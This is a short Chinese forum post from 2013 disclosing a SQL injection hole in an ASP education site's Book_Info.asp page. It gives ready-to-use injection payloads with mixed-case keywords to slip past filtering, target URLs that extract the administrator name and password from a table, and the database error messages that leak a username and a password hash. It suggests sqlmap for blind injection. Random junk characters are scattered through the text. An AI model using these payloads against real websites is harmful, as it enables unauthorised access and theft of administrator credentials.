漏洞出现在Educate/Book_Info.asp
9 @3 L" A: q( s3 v2 x5 [
4 Q, p/ H9 W/ {2 [& z! c此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ `( L2 Z! X" `
9 m2 [% A8 R [' y9 O$ e
exp:如下* G, H) A1 G2 W+ {7 j' b
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 u: x" i7 \2 W- \; x# V
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 ]# @# R9 C" D
- j6 [9 G1 Y: x3 ~# | Zhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
: v" I6 r. s& S# @+ d- O+ R
, N" B2 {6 [% ~Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
) n1 B& L" w& ^$ ]7 {4 [& j( R
% I0 f+ K7 x6 r/ r将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
: v, W" B& X7 G + o! n ?/ q9 i" Z
/Educate/Book_Info.asp,行 8
! h4 R& B* i5 N1 U4 G
3 R8 y7 |7 d" R* L/ khttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ T+ c4 p/ }* F. v# ` ; ?* V$ G' M& u9 `* t
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'& h( l( F$ X; z N8 P: s
; s3 t2 B' F, [( ?6 B
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。- l. `9 G, O( ]' O9 E, H6 M& T
, M, k% r; V8 o* D; m% g1 y/ j/Educate/Book_Info.asp,行 8
2 p; n2 V; l) ^4 H& g' {+ Q |
发表于 2013-2-16 21:44:16
收藏
支持
反对